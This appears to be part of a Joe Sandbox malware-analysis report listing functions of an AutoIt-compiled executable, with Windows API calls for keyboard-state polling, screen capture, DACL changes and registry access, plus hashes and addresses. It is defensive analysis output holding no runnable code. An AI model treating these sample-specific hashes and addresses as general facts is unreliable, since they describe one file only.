                                                        • Part of subcall function 00AB874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AB879D
                                                        • Part of subcall function 00AB87E7: GetProcessHeap.KERNEL32(00000008,00AB8240,00000000,00000000,?,00AB8240,?), ref: 00AB87F3
                                                        • Part of subcall function 00AB87E7: HeapAlloc.KERNEL32(00000000,?,00AB8240,?), ref: 00AB87FA
                                                        • Part of subcall function 00AB87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00AB8240,?), ref: 00AB880B
                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AB8458
                                                      • _memset.LIBCMT ref: 00AB846D
                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AB848C
                                                      • GetLengthSid.ADVAPI32(?), ref: 00AB849D
                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00AB84DA
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AB84F6
                                                      • GetLengthSid.ADVAPI32(?), ref: 00AB8513
                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00AB8522
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00AB8529
                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AB854A
                                                      • CopySid.ADVAPI32(00000000), ref: 00AB8551
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AB8582
                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AB85A8
                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AB85BC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                      • String ID:
                                                      • API String ID: 3996160137-0
                                                      • Opcode ID: d684039d0955515fd3b86a97cd188b5b79690fb9101d472cd7d0fc05467ecf27
                                                      • Instruction ID: e65f709db88ea1b8b97c517da043febfaaf18f24bf3d10df3caf8e393eed52a6
                                                      • Opcode Fuzzy Hash: d684039d0955515fd3b86a97cd188b5b79690fb9101d472cd7d0fc05467ecf27
                                                      • Instruction Fuzzy Hash: 23613C71900209BFDF10DF98DD85AEEBBBDFF04304F148269E915AA292DB359A05CF60
                                                      Function 00AD762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 00AD76A2
                                                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00AD76AE
                                                      • CreateCompatibleDC.GDI32(?), ref: 00AD76BA
                                                      • SelectObject.GDI32(00000000,?), ref: 00AD76C7
                                                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00AD771B
                                                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00AD7757
                                                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00AD777B
                                                      • SelectObject.GDI32(00000006,?), ref: 00AD7783
                                                      • DeleteObject.GDI32(?), ref: 00AD778C
                                                      • DeleteDC.GDI32(00000006), ref: 00AD7793
                                                      • ReleaseDC.USER32(00000000,?), ref: 00AD779E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                      • String ID: (
                                                      • API String ID: 2598888154-3887548279
                                                      • Opcode ID: 0099430ef7aa278fe3436ba369a017edf5526d334d669adfa6ab83bfb8739246
                                                      • Instruction ID: 189bf48c7bd16b7fd445ea2033de10a64cb81a32917fcbf8e3369bae75ee2fb1
                                                      • Opcode Fuzzy Hash: 0099430ef7aa278fe3436ba369a017edf5526d334d669adfa6ab83bfb8739246
                                                      • Instruction Fuzzy Hash: 6F515875904249EFCB15CFA8CC84EAEBBB9EF48310F14842EF94A97310E731A941CB60
                                                      Function 00ACA0B5 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadStringW.USER32(00000066,?,00000FFF,00AEFB78), ref: 00ACA0FC
                                                        • Part of subcall function 00A67F41: _memmove.LIBCMT ref: 00A67F82
                                                      • LoadStringW.USER32(?,?,00000FFF,?), ref: 00ACA11E
                                                      • __swprintf.LIBCMT ref: 00ACA177
                                                      • __swprintf.LIBCMT ref: 00ACA190
                                                      • _wprintf.LIBCMT ref: 00ACA246
                                                      • _wprintf.LIBCMT ref: 00ACA264
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: LoadString__swprintf_wprintf$_memmove
                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                      • API String ID: 311963372-2391861430
                                                      • Opcode ID: 1ae09c200ae9dfedfbf7fcf97e48be0ce2fa710aaa8fbb0c473d78331b9a56b1
                                                      • Instruction ID: 3145311363c69e8f7dc14bf4ee9ae3f86689cc192487f0b669a3db770e689d21
                                                      • Opcode Fuzzy Hash: 1ae09c200ae9dfedfbf7fcf97e48be0ce2fa710aaa8fbb0c473d78331b9a56b1
                                                      • Instruction Fuzzy Hash: 4B516E32900219AACF15EBE0CE96EFEB7B9AF14304F144165F515730A2EB316F59CB61
                                                      Function 00A66BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A80B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00A66C6C,?,00008000), ref: 00A80BB7
                                                        • Part of subcall function 00A648AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A648A1,?,?,00A637C0,?), ref: 00A648CE
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00A66D0D
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00A66E5A
                                                        • Part of subcall function 00A659CD: _wcscpy.LIBCMT ref: 00A65A05
                                                        • Part of subcall function 00A8387D: _iswctype.LIBCMT ref: 00A83885
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                      • API String ID: 537147316-1018226102
                                                      • Opcode ID: f3ddc615781f4c9e7fd155600aef788331d66c90b577acc47f2fe400c4ac35aa
                                                      • Instruction ID: bbe28332b4069eca9a1158219bd056a2fc5a50ff6f7c77515d48b0b5a0284a5b
                                                      • Opcode Fuzzy Hash: f3ddc615781f4c9e7fd155600aef788331d66c90b577acc47f2fe400c4ac35aa
                                                      • Instruction Fuzzy Hash: AF02AB315083409FCB24EF24CA91AAFBBF5BF99354F04492DF486972A2DB31D949CB42
                                                      Function 00A645DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00A645F9
                                                      • GetMenuItemCount.USER32(00B26890), ref: 00A9D7CD
                                                      • GetMenuItemCount.USER32(00B26890), ref: 00A9D87D
                                                      • GetCursorPos.USER32(?), ref: 00A9D8C1
                                                      • SetForegroundWindow.USER32(00000000), ref: 00A9D8CA
                                                      • TrackPopupMenuEx.USER32(00B26890,00000000,?,00000000,00000000,00000000), ref: 00A9D8DD
                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00A9D8E9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                      • String ID:
                                                      • API String ID: 2751501086-0
                                                      • Opcode ID: b1526f6c87f045e4119ea312bf081e1d657da3a908f3d1683c94b386d4ad8cc4
                                                      • Instruction ID: 4bd528583b2460158c9f7e5fc87877c532b644790d4509624c466179d5a19a0d
                                                      • Opcode Fuzzy Hash: b1526f6c87f045e4119ea312bf081e1d657da3a908f3d1683c94b386d4ad8cc4
                                                      • Instruction Fuzzy Hash: 9B71D374701245BEEF219FA4DC85FAABFB4FF05364F204216F515AA1E1C7B15850DBA0
                                                      Function 00AE10A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AE0038,?,?), ref: 00AE10BC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpper
                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                      • API String ID: 3964851224-909552448
                                                      • Opcode ID: 33c0f63da7986be29c5934043bd34a3525c02a9958a5b2cec6735061625cdaa7
                                                      • Instruction ID: 27d3661c8e8d3b15247d84315d2438d3539530c83db5ac2a1169b7f20b2b7cca
                                                      • Opcode Fuzzy Hash: 33c0f63da7986be29c5934043bd34a3525c02a9958a5b2cec6735061625cdaa7
                                                      • Instruction Fuzzy Hash: 6D419A3125029E9FCF50EF91DE91EEE3361AF15300F5045A8FD915B292EB30AD5ACBA0
                                                      Function 00AC5569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A67D2C: _memmove.LIBCMT ref: 00A67D66
                                                        • Part of subcall function 00A67A84: _memmove.LIBCMT ref: 00A67B0D
                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00AC55D2
                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00AC55E8
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AC55F9
                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00AC560B
                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00AC561C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: SendString$_memmove
                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                      • API String ID: 2279737902-1007645807
                                                      • Opcode ID: a7af4036d39133e4a0a220ea33ce52cf61f8c2b35057d3313e4949c1d47b68be
                                                      • Instruction ID: 962dd668365230354197fd62b6a3319669e32a1afa6ab41aa625e5ec9c10bf9d
                                                      • Opcode Fuzzy Hash: a7af4036d39133e4a0a220ea33ce52cf61f8c2b35057d3313e4949c1d47b68be
                                                      • Instruction Fuzzy Hash: 1A11C820D6115979D720F7B1DC49EFFBBBCEF91B04F840469B421A20D2DE602D85C5A1
                                                      Function 00AC48F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                      • String ID: 0.0.0.0
                                                      • API String ID: 208665112-3771769585
                                                      • Opcode ID: ae079b5c8798b5bd7eb45605c71aebdefde7946f423bd9fdb99cae4844dcb29f
                                                      • Instruction ID: 6c33c179458a3941615e2c55f1566dd4a26f28225afeece13f09937b35fa9d65
                                                      • Opcode Fuzzy Hash: ae079b5c8798b5bd7eb45605c71aebdefde7946f423bd9fdb99cae4844dcb29f
                                                      • Instruction Fuzzy Hash: D011D231904125AFCB24EB64ED4AFEB77BCDB44710F0501BAF544A6091EF709E8287A5
                                                      Function 00AC5217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • timeGetTime.WINMM ref: 00AC521C
                                                        • Part of subcall function 00A80719: timeGetTime.WINMM(?,7608B400,00A70FF9), ref: 00A8071D
                                                      • Sleep.KERNEL32(0000000A), ref: 00AC5248
                                                      • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00AC526C
                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00AC528E
                                                      • SetActiveWindow.USER32 ref: 00AC52AD
                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00AC52BB
                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00AC52DA
                                                      • Sleep.KERNEL32(000000FA), ref: 00AC52E5
                                                      • IsWindow.USER32 ref: 00AC52F1
                                                      • EndDialog.USER32(00000000), ref: 00AC5302
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                      • String ID: BUTTON
                                                      • API String ID: 1194449130-3405671355
                                                      • Opcode ID: c667644140d58debd08aa71571007be1f51fe6fe150601a341009845b3aab745
                                                      • Instruction ID: 2a488445f2fe26233e027301be98758355ce20a4d255eda0b3dc1cd9797cbf49
                                                      • Opcode Fuzzy Hash: c667644140d58debd08aa71571007be1f51fe6fe150601a341009845b3aab745
                                                      • Instruction Fuzzy Hash: 7021C670544784AFE7109BB0EDD8F257BA9EB65346F01042CF5018A1B1DF71AD828B25
                                                      Function 00ACD7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A69997: __itow.LIBCMT ref: 00A699C2
                                                        • Part of subcall function 00A69997: __swprintf.LIBCMT ref: 00A69A0C
                                                      • CoInitialize.OLE32(00000000), ref: 00ACD855
                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00ACD8E8
                                                      • SHGetDesktopFolder.SHELL32(?), ref: 00ACD8FC
                                                      • CoCreateInstance.OLE32(00AF2D7C,00000000,00000001,00B1A89C,?), ref: 00ACD948
                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00ACD9B7
                                                      • CoTaskMemFree.OLE32(?,?), ref: 00ACDA0F
                                                      • _memset.LIBCMT ref: 00ACDA4C
                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00ACDA88
                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00ACDAAB
                                                      • CoTaskMemFree.OLE32(00000000), ref: 00ACDAB2
                                                      • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00ACDAE9
                                                      • CoUninitialize.OLE32(00000001,00000000), ref: 00ACDAEB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                      • String ID:
                                                      • API String ID: 1246142700-0
                                                      • Opcode ID: 7dd7d3bf74838d17491826cefb23b636884281425073f9dbbcbd8e346bedf760
                                                      • Instruction ID: e9388fbdee48f6188aabaf4264b999f32fa761f23201a3c97bb853f0810a9b86
                                                      • Opcode Fuzzy Hash: 7dd7d3bf74838d17491826cefb23b636884281425073f9dbbcbd8e346bedf760
                                                      • Instruction Fuzzy Hash: 2FB1EB75A00109AFDB04DFA5C988EAEBBF9FF48314B158469F509EB261DB30ED45CB50
                                                      Function 00AC052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 00AC05A7
                                                      • SetKeyboardState.USER32(?), ref: 00AC0612
                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00AC0632
                                                      • GetKeyState.USER32(000000A0), ref: 00AC0649
                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00AC0678
                                                      • GetKeyState.USER32(000000A1), ref: 00AC0689
                                                      • GetAsyncKeyState.USER32(00000011), ref: 00AC06B5
                                                      • GetKeyState.USER32(00000011), ref: 00AC06C3
                                                      • GetAsyncKeyState.USER32(00000012), ref: 00AC06EC
                                                      • GetKeyState.USER32(00000012), ref: 00AC06FA
                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00AC0723
                                                      • GetKeyState.USER32(0000005B), ref: 00AC0731
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: State$Async$Keyboard
                                                      • String ID:
                                                      • API String ID: 541375521-0
                                                      • Opcode ID: 363301589b072a9fcfdaa685f1f6790f94bb5f716af023f4ada2cbf4fe9f696e
                                                      • Instruction ID: fb210bf7587e567a6e7bedbea5438010c8eb2be479ad5644e8db69c75c64f728
                                                      • Opcode Fuzzy Hash: 363301589b072a9fcfdaa685f1f6790f94bb5f716af023f4ada2cbf4fe9f696e
                                                      • Instruction Fuzzy Hash: 2651CC60A047889AFF35DBA08554FEABFB49F12340F09859DD5C25B1C2DAA49B4CCF61
                                                      Function 00ABC72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDlgItem.USER32(?,00000001), ref: 00ABC746
                                                      • GetWindowRect.USER32(00000000,?), ref: 00ABC758
                                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00ABC7B6
                                                      • GetDlgItem.USER32(?,00000002), ref: 00ABC7C1
                                                      • GetWindowRect.USER32(00000000,?), ref: 00ABC7D3
                                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00ABC827
                                                      • GetDlgItem.USER32(?,000003E9), ref: 00ABC835
                                                      • GetWindowRect.USER32(00000000,?), ref: 00ABC846
                                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00ABC889
                                                      • GetDlgItem.USER32(?,000003EA), ref: 00ABC897
                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00ABC8B4
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00ABC8C1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                      • String ID:
                                                      • API String ID: 3096461208-0
                                                      • Opcode ID: c28e65238b94aae38f67b03449812d7a6bacc4dd245c8e834bcbf6979b5ea018
                                                      • Instruction ID: e1f9d70c756963f19fabf82fb0232655a69985c34edbdb148693e3b615ef7d91
                                                      • Opcode Fuzzy Hash: c28e65238b94aae38f67b03449812d7a6bacc4dd245c8e834bcbf6979b5ea018
                                                      • Instruction Fuzzy Hash: 25515F71B00245AFDF18CFA8DD99EAEBBBAEB88310F14812DF515D7291D7709D408B10
                                                      Function 00A6201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A61B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A62036,?,00000000,?,?,?,?,00A616CB,00000000,?), ref: 00A61B9A
                                                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00A620D3
                                                      • KillTimer.USER32(-00000001,?,?,?,?,00A616CB,00000000,?,?,00A61AE2,?,?), ref: 00A6216E
                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 00A9BEF6
                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A616CB,00000000,?,?,00A61AE2,?,?), ref: 00A9BF27
                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A616CB,00000000,?,?,00A61AE2,?,?), ref: 00A9BF3E
                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A616CB,00000000,?,?,00A61AE2,?,?), ref: 00A9BF5A
                                                      • DeleteObject.GDI32(00000000), ref: 00A9BF6C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
